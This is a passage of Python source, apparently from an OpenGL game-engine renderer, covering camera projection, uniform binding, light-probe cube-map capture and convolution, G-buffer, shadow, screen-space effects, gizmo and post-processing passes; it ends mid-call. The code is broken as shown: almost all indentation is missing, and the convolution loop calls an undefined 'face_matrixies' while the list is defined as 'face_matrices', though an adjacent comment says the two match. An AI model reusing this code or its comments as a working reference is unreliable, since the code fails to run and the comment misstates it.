glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, self.viewport.width, 0, self.viewport.height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def perspective_view(self, look_at=True):
camera = self.scene_manager.main_camera
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(camera.fov, camera.aspect, camera.near, camera.far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def look_at(self):
camera = self.scene_manager.main_camera
camera_target = -camera.transform.front
camera_up = camera.transform.up
glScalef(*(1.0 / camera.transform.get_scale()))
gluLookAt(0.0, 0.0, 0.0, *camera_target, *camera_up)
glTranslatef(*(-camera.transform.get_pos()))
def set_debug_texture(self, texture):
if texture is not None and texture is not RenderTargets.BACKBUFFER and type(texture) != RenderBuffer:
self.debug_texture = texture
self.postprocess.is_render_material_instance = False
logger.info("Current texture : %s" % self.debug_texture.name)
else:
self.debug_texture = None
def bind_uniform_blocks(self):
camera = self.scene_manager.main_camera
main_light = self.scene_manager.main_light
if not camera or not main_light:
return
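        # wrap the frame counter to a 16-sample cycle; consumed below as the
        # JITTER_FRAME uniform used for temporal jittering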
frame_count = self.core_manager.frame_count % 16
uniform_data = self.uniform_scene_data
uniform_data['TIME'] = self.core_manager.current_time
uniform_data['JITTER_FRAME'] = frame_count
uniform_data['RENDER_SSR'] = self.postprocess.is_render_ssr
uniform_data['RENDER_SSAO'] = self.postprocess.is_render_ssao
uniform_data['SCREEN_SIZE'] = (self.core_manager.game_backend.width, self.core_manager.game_backend.height)
uniform_data['BACKBUFFER_SIZE'] = (RenderTargets.BACKBUFFER.width, RenderTargets.BACKBUFFER.height)
uniform_data['MOUSE_POS'] = self.core_manager.get_mouse_pos()
uniform_data['DELTA_TIME'] = self.core_manager.delta
self.uniform_scene_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_view_data
uniform_data['VIEW'][...] = camera.view
uniform_data['INV_VIEW'][...] = camera.inv_view
uniform_data['VIEW_ORIGIN'][...] = camera.view_origin
uniform_data['INV_VIEW_ORIGIN'][...] = camera.inv_view_origin
uniform_data['PROJECTION'][...] = camera.projection_jitter
uniform_data['INV_PROJECTION'][...] = camera.inv_projection_jitter
uniform_data['CAMERA_POSITION'][...] = camera.transform.get_pos()
uniform_data['NEAR_FAR'][...] = (camera.near, camera.far)
uniform_data['JITTER_DELTA'][...] = self.postprocess.jitter_delta
uniform_data['JITTER_OFFSET'][...] = self.postprocess.jitter
self.uniform_view_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_light_data
uniform_data['SHADOW_MATRIX'][...] = main_light.shadow_view_projection
uniform_data['SHADOW_EXP'] = main_light.shadow_exp
uniform_data['SHADOW_BIAS'] = main_light.shadow_bias
uniform_data['SHADOW_SAMPLES'] = main_light.shadow_samples
uniform_data['LIGHT_POSITION'][...] = main_light.transform.get_pos()
uniform_data['LIGHT_DIRECTION'][...] = main_light.transform.front
uniform_data['LIGHT_COLOR'][...] = main_light.light_color[:3]
self.uniform_light_buffer.bind_uniform_block(data=uniform_data)
self.uniform_point_light_buffer.bind_uniform_block(data=self.uniform_point_light_data)
def render_light_probe(self, light_probe):
if light_probe.isRendered:
return
logger.info("Rendering Light Probe")
# Set Valid
light_probe.isRendered = True
camera = self.scene_manager.main_camera
old_pos = camera.transform.get_pos().copy()
old_rot = camera.transform.get_rotation().copy()
old_fov = camera.fov
old_aspect = camera.aspect
old_render_font = RenderOption.RENDER_FONT
old_render_skeleton = RenderOption.RENDER_SKELETON_ACTOR
old_render_effect = RenderOption.RENDER_EFFECT
old_render_collision = RenderOption.RENDER_COLLISION
old_render_ssr = self.postprocess.is_render_ssr
old_render_motion_blur = self.postprocess.is_render_motion_blur
old_antialiasing = self.postprocess.anti_aliasing
old_debug_absolute = self.postprocess.debug_absolute
old_debug_mipmap = self.postprocess.debug_mipmap
old_debug_intensity_min = self.postprocess.debug_intensity_min
old_debug_intensity_max = self.postprocess.debug_intensity_max
# set render light probe
RenderOption.RENDER_LIGHT_PROBE = True
RenderOption.RENDER_SKELETON_ACTOR = False
RenderOption.RENDER_EFFECT = False
RenderOption.RENDER_FONT = False
self.postprocess.is_render_motion_blur = False
self.postprocess.anti_aliasing = AntiAliasing.NONE_AA
camera.update_projection(fov=90.0, aspect=1.0)
def render_cube_face(dst_texture, target_face, pos, rotation):
camera.transform.set_pos(pos)
camera.transform.set_rotation(rotation)
camera.update(force_update=True)
# render
self.render_scene()
# copy
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(dst_texture, target_face=target_face)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.mirror_framebuffer(src_framebuffer)
return dst_texture
target_faces = [GL_TEXTURE_CUBE_MAP_POSITIVE_X,
GL_TEXTURE_CUBE_MAP_NEGATIVE_X,
GL_TEXTURE_CUBE_MAP_POSITIVE_Y,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y,
GL_TEXTURE_CUBE_MAP_POSITIVE_Z,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z]
pos = light_probe.transform.get_pos()
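        # per-face camera euler rotations, one entry per face of target_faces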
camera_rotations = [[0.0, math.pi * 1.5, 0.0],
[0.0, math.pi * 0.5, 0.0],
[math.pi * -0.5, math.pi * 1.0, 0.0],
[math.pi * 0.5, math.pi * 1.0, 0.0],
[0.0, math.pi * 1.0, 0.0],
[0.0, 0.0, 0.0]]
# render atmosphere scene to light_probe textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = True
texture_cube = RenderTargets.LIGHT_PROBE_ATMOSPHERE
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# render final scene to temp textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = False
texture_cube = light_probe.texture_probe
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# convolution
texture_info = light_probe.texture_probe.get_texture_info()
texture_info['name'] = 'temp_cube'
temp_cube = CreateTexture(**texture_info)
mipmap_count = temp_cube.get_mipmap_count()
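        # one orientation matrix per cube-map face (target_faces order), bound
        # below as the convolution shader's "face_matrix" uniform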
        face_matrices = [np.array([[0, 0, 1, 0], [0, 1, 0, 0], [-1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[0, 0, -1, 0], [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]], dtype=np.float32)]
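# Note: face_matrices is indexed in lock-step with target_faces above, so
# cube-map face i is convolved using orientation matrix i.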
convolve_environment = self.resource_manager.get_material_instance('convolve_environment')
convolve_environment.use_program()
for i in range(6):
for lod in range(mipmap_count):
self.framebuffer_manager.bind_framebuffer(temp_cube, target_face=target_faces[i], target_level=lod)
glClear(GL_COLOR_BUFFER_BIT)
convolve_environment.bind_uniform_data("texture_environment", texture_cube)
convolve_environment.bind_uniform_data("face_matrix", face_matrixies[i])
convolve_environment.bind_uniform_data("lod", float(lod))
convolve_environment.bind_uniform_data("mipmap_count", float(mipmap_count))
self.postprocess.draw_elements()
light_probe.replace_texture_probe(temp_cube)
self.rendertarget_manager.get_temporary('temp_cube', light_probe.texture_probe)
RenderOption.RENDER_LIGHT_PROBE = False
RenderOption.RENDER_SKELETON_ACTOR = old_render_skeleton
RenderOption.RENDER_EFFECT = old_render_effect
RenderOption.RENDER_FONT = old_render_font
RenderOption.RENDER_COLLISION = old_render_collision
self.postprocess.is_render_ssr = old_render_ssr
self.postprocess.is_render_motion_blur = old_render_motion_blur
self.postprocess.anti_aliasing = old_antialiasing
self.postprocess.debug_absolute = old_debug_absolute
self.postprocess.debug_mipmap = old_debug_mipmap
self.postprocess.debug_intensity_min = old_debug_intensity_min
self.postprocess.debug_intensity_max = old_debug_intensity_max
camera.update_projection(old_fov, old_aspect)
camera.transform.set_pos(old_pos)
camera.transform.set_rotation(old_rot)
camera.update(force_update=True)
def render_gbuffer(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# render terrain
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.GBUFFER)
# render static actor
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.static_solid_render_infos)
# render velocity
self.framebuffer_manager.bind_framebuffer(RenderTargets.VELOCITY)
glClear(GL_COLOR_BUFFER_BIT)
if RenderOption.RENDER_STATIC_ACTOR:
self.postprocess.render_velocity(RenderTargets.DEPTH)
# render skeletal actor gbuffer
if RenderOption.RENDER_SKELETON_ACTOR:
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
RenderTargets.VELOCITY,
depth_texture=RenderTargets.DEPTH)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.skeleton_solid_render_infos)
def render_shadow(self):
light = self.scene_manager.main_light
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# static shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.STATIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.SHADOW)
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR, RenderMode.SHADOW, self.scene_manager.static_shadow_render_infos, self.shadowmap_material)
# dynamic shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.DYNAMIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR, RenderMode.SHADOW, self.scene_manager.skeleton_shadow_render_infos, self.shadowmap_skeletal_material)
# composite shadow maps
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glDisable(GL_CULL_FACE)
self.postprocess.render_composite_shadowmap(RenderTargets.STATIC_SHADOWMAP, RenderTargets.DYNAMIC_SHADOWMAP)
def render_preprocess(self):
# Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# Screen Space Reflection
if self.postprocess.is_render_ssr:
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection(RenderTargets.HDR,
RenderTargets.WORLD_NORMAL,
RenderTargets.MATERIAL,
RenderTargets.VELOCITY,
RenderTargets.LINEAR_DEPTH)
# swap ssr resolve textures
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV = \
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection_resolve(RenderTargets.SCREEN_SPACE_REFLECTION,
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV,
RenderTargets.VELOCITY)
# SSAO
if self.postprocess.is_render_ssao:
temp_ssao = self.rendertarget_manager.get_temporary('temp_ssao', RenderTargets.SSAO)
self.framebuffer_manager.bind_framebuffer(RenderTargets.SSAO)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_ssao(texture_size=(RenderTargets.SSAO.width, RenderTargets.SSAO.height),
texture_lod=self.rendertarget_manager.texture_lod_in_ssao,
texture_normal=RenderTargets.WORLD_NORMAL,
texture_linear_depth=RenderTargets.LINEAR_DEPTH)
self.postprocess.render_gaussian_blur(RenderTargets.SSAO, temp_ssao)
def render_solid(self):
if RenderingType.DEFERRED_RENDERING == self.render_option_manager.rendering_type:
self.postprocess.render_deferred_shading(self.scene_manager.get_light_probe_texture(),
self.scene_manager.atmosphere)
elif RenderingType.FORWARD_RENDERING == self.render_option_manager.rendering_type:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_solid_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_solid_render_infos)
def render_translucent(self):
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_translucent_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_translucent_render_infos)
for render_custom_translucent_callback in self.render_custom_translucent_callbacks:
render_custom_translucent_callback()
self.render_custom_translucent_callbacks.clear()
def render_effect(self):
self.scene_manager.effect_manager.render()
def render_actors(self, render_group, render_mode, render_infos, scene_material_instance=None):
if len(render_infos) < 1:
return
last_actor = None
last_actor_material = None
last_actor_material_instance = None
if scene_material_instance is not None:
scene_material_instance.use_program()
scene_material_instance.bind_material_instance()
# render
for render_info in render_infos:
actor = render_info.actor
geometry = render_info.geometry
actor_material = render_info.material
actor_material_instance = render_info.material_instance
is_instancing = actor.is_instancing()
if RenderMode.GBUFFER == render_mode or RenderMode.FORWARD_SHADING == render_mode:
if last_actor_material != actor_material and actor_material is not None:
actor_material.use_program()
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
actor_material_instance.bind_material_instance()
actor_material_instance.bind_uniform_data('is_render_gbuffer', RenderMode.GBUFFER == render_mode)
if RenderMode.FORWARD_SHADING == render_mode:
actor_material_instance.bind_uniform_data('texture_probe', self.scene_manager.get_light_probe_texture())
actor_material_instance.bind_uniform_data('texture_shadow', RenderTargets.COMPOSITE_SHADOWMAP)
actor_material_instance.bind_uniform_data('texture_ssao', RenderTargets.SSAO)
actor_material_instance.bind_uniform_data('texture_scene_reflect', RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
# Bind Atmosphere
self.scene_manager.atmosphere.bind_precomputed_atmosphere(actor_material_instance)
elif RenderMode.SHADOW == render_mode:
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
# get diffuse texture from actor material instance
data_diffuse = actor_material_instance.get_uniform_data('texture_diffuse')
scene_material_instance.bind_uniform_data('texture_diffuse', data_diffuse)
if last_actor != actor:
material_instance = scene_material_instance or actor_material_instance
if RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', actor.get_object_id())
elif RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', actor.get_object_color())
material_instance.bind_uniform_data('is_instancing', is_instancing)
material_instance.bind_uniform_data('model', actor.transform.matrix)
if render_group == RenderGroup.SKELETON_ACTOR:
animation_buffer = actor.get_animation_buffer(geometry.skeleton.index)
prev_animation_buffer = actor.get_prev_animation_buffer(geometry.skeleton.index)
material_instance.bind_uniform_data('bone_matrices', animation_buffer, num=len(animation_buffer))
material_instance.bind_uniform_data('prev_bone_matrices', prev_animation_buffer, num=len(prev_animation_buffer))
# draw
if is_instancing:
geometry.draw_elements_instanced(actor.get_instance_render_count(), self.actor_instance_buffer, [actor.instance_matrix, ])
else:
geometry.draw_elements()
last_actor = actor
last_actor_material = actor_material
last_actor_material_instance = actor_material_instance
def render_selected_object(self):
selected_object = self.scene_manager.get_selected_object()
if selected_object is not None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_RGBA8)
glDisable(GL_DEPTH_TEST)
glDepthMask(False)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.set_blend_state(False)
object_type = type(selected_object)
if SkeletonActor == object_type and RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_skeletal_object_material)
elif StaticActor == object_type and RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_static_object_material)
elif Spline3D == object_type:
self.debug_line_manager.bind_render_spline_program()
self.debug_line_manager.render_spline(selected_object, Float4(1.0, 1.0, 1.0, 1.0))
else:
return
# composite
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.selcted_object_composite_material.use_program()
self.selcted_object_composite_material.bind_uniform_data("texture_mask", RenderTargets.TEMP_RGBA8)
self.postprocess.draw_elements()
def render_axis_gizmo(self, render_mode):
if self.scene_manager.get_selected_object() is not None:
axis_gizmo_actor = self.scene_manager.get_axis_gizmo()
material_instance = None
if RenderMode.GIZMO == render_mode:
material_instance = self.render_color_material
elif RenderMode.OBJECT_ID == render_mode:
material_instance = self.static_object_id_material
material_instance.use_program()
material_instance.bind_uniform_data('is_instancing', False)
material_instance.bind_uniform_data('model', axis_gizmo_actor.transform.matrix)
geometries = axis_gizmo_actor.get_geometries()
for i, geometry in enumerate(geometries):
if RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', axis_gizmo_actor.get_object_color(i))
elif RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', axis_gizmo_actor.get_object_id(i))
geometry.draw_elements()
def render_object_id(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.OBJECT_ID, depth_texture=RenderTargets.OBJECT_ID_DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.set_blend_state(False)
# render static actor object id
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_solid_render_infos,
self.static_object_id_material)
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_translucent_render_infos,
self.static_object_id_material)
# render skeletal actor object id
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_solid_render_infos,
self.skeletal_object_id_material)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_translucent_render_infos,
self.skeletal_object_id_material)
# spline object id
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
object_id = spline.get_object_id()
self.debug_line_manager.render_spline(spline, Float4(object_id, object_id, object_id, 1.0), add_width=10.0)
# spline gizmo object id
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.spline_gizmo_render_infos,
self.static_object_id_material)
# gizmo object id
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.OBJECT_ID)
def render_heightmap(self, actor):
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_HEIGHT_MAP)
self.set_blend_state(blend_enable=True, equation=GL_MAX, func_src=GL_ONE, func_dst=GL_ONE)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_CULL_FACE)
glDisable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
self.render_heightmap_material.use_program()
self.render_heightmap_material.bind_material_instance()
self.render_heightmap_material.bind_uniform_data('model', actor.transform.matrix)
self.render_heightmap_material.bind_uniform_data('bound_box_min', actor.bound_box.bound_min)
self.render_heightmap_material.bind_uniform_data('bound_box_max', actor.bound_box.bound_max)
actor.get_geometry(0).draw_elements()
if RenderTargets.TEMP_HEIGHT_MAP.enable_mipmap:
self.postprocess.render_generate_max_z(RenderTargets.TEMP_HEIGHT_MAP)
def render_bones(self):
glDisable(GL_DEPTH_TEST)
glDisable(GL_CULL_FACE)
mesh = self.resource_manager.get_mesh("Cube")
static_actors = self.scene_manager.static_actors[:]
if mesh and self.debug_bone_material:
material_instance = self.debug_bone_material
material_instance.use_program()
material_instance.bind()
def draw_bone(mesh, skeleton_mesh, parent_matrix, material_instance, bone, root_matrix, isAnimation):
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
if bone.children:
for child_bone in bone.children:
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
child_transform = skeleton_mesh.get_animation_transform(child_bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
child_transform = np.linalg.inv(child_bone.inv_bind_matrix)
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
material_instance.bind_uniform_data("mat2", np.dot(child_transform, root_matrix))
mesh.draw_elements()
draw_bone(mesh, skeleton_mesh, bone_transform.copy(), material_instance, child_bone, root_matrix, isAnimation)
else:
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
child_transform = np.dot(bone_transform, root_matrix)
child_transform[3, :] += child_transform[1, :]
material_instance.bind_uniform_data("mat2", child_transform)
mesh.draw_elements()
for static_actor in static_actors:
if static_actor.model and static_actor.model.mesh and static_actor.model.mesh.skeletons:
skeletons = static_actor.model.mesh.skeletons
skeleton_mesh = static_actor.model.mesh
frame_count = skeleton_mesh.get_animation_frame_count()
frame = math.fmod(self.core_manager.current_time * 30.0, frame_count) if frame_count > 0.0 else 0.0
isAnimation = frame_count > 0.0
for skeleton in skeletons:
matrix = static_actor.transform.matrix
for bone in skeleton.hierachy:
draw_bone(mesh, skeleton_mesh, Matrix4().copy(), material_instance, bone, matrix, isAnimation)
def render_postprocess(self):
# bind frame buffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# copy HDR target
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Temporal AA
if AntiAliasing.TAA == self.postprocess.anti_aliasing:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_temporal_antialiasing(RenderTargets.HDR_TEMP,
RenderTargets.TAA_RESOLVE,
RenderTargets.VELOCITY)
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.TAA_RESOLVE)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Bloom
if self.postprocess.is_render_bloom:
self.postprocess.render_bloom(RenderTargets.HDR)
# Light Shaft
if self.postprocess.is_render_light_shaft:
self.framebuffer_manager.bind_framebuffer(RenderTargets.LIGHT_SHAFT)
self.postprocess.render_light_shaft(RenderTargets.ATMOSPHERE, RenderTargets.DEPTH)
# Depth Of Field
if self.postprocess.is_render_depth_of_field:
self.postprocess.render_depth_of_field()
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
RenderTargets.HDR.generate_mipmap()
# Tone Map
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_tone_map(RenderTargets.HDR,
RenderTargets.BLOOM_0,
RenderTargets.BLOOM_1,
RenderTargets.BLOOM_2,
RenderTargets.BLOOM_3,
RenderTargets.BLOOM_4,
RenderTargets.LIGHT_SHAFT)
# MSAA Test
if AntiAliasing.MSAA == self.postprocess.anti_aliasing:
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# resolve MSAA
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Motion Blur
if self.postprocess.is_render_motion_blur:
backbuffer_copy = self.rendertarget_manager.get_temporary('backbuffer_copy', RenderTargets.BACKBUFFER)
self.framebuffer_manager.bind_framebuffer(backbuffer_copy)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_motion_blur(RenderTargets.VELOCITY, RenderTargets.BACKBUFFER)
# copy to backbuffer
src_framebuffer = self.framebuffer_manager.get_framebuffer(backbuffer_copy)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
def render_log(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.font_manager.render_log(self.viewport.width, self.viewport.height)
def render_text(self, text_render_data, offset_x, offset_y, canvas_width, canvas_height):
if 0 < text_render_data.render_count:
self.font_shader.use_program()
self.font_shader.bind_material_instance()
self.font_shader.bind_uniform_data("texture_font", text_render_data.font_data.texture)
self.font_shader.bind_uniform_data("font_size", text_render_data.font_size)
self.font_shader.bind_uniform_data("offset", (offset_x, offset_y))
self.font_shader.bind_uniform_data("inv_canvas_size", (1.0 / canvas_width, 1.0 / canvas_height))
self.font_shader.bind_uniform_data("count_of_side", text_render_data.font_data.count_of_side)
self.postprocess.draw_elements_instanced(text_render_data.render_count, self.font_instance_buffer, [text_render_data.render_queue, ])
def render_axis(self):
camera = self.scene_manager.main_camera
line_thickness = 2.0
line_length = 100.0
line_size = Float2(line_length / self.core_manager.game_backend.width, line_length / self.core_manager.game_backend.height)
line_offset = line_size - 1.0
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[2][0:2] * line_size, color=Float4(0.0, 0.0, 1.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[1][0:2] * line_size, color=Float4(0.0, 1.0, 0.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[0][0:2] * line_size, color=Float4(1.0, 0.0, 0.0, 1.0), width=line_thickness)
def render_scene(self):
main_camera = self.scene_manager.main_camera
# bind scene constants uniform blocks
self.bind_uniform_blocks()
self.set_blend_state(False)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
glPolygonMode(GL_FRONT_AND_BACK, self.view_mode)
# glEnable(GL_FRAMEBUFFER_SRGB)
glEnable(GL_MULTISAMPLE)
glEnable(GL_TEXTURE_CUBE_MAP_SEAMLESS)
glDepthFunc(GL_LEQUAL)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
if self.postprocess.is_render_shader() and not RenderOption.RENDER_LIGHT_PROBE:
""" debug shader """
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_material_instance()
elif RenderOption.RENDER_ONLY_ATMOSPHERE and RenderOption.RENDER_LIGHT_PROBE:
""" render light probe preprocess """
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.WORLD_NORMAL, depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 1.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
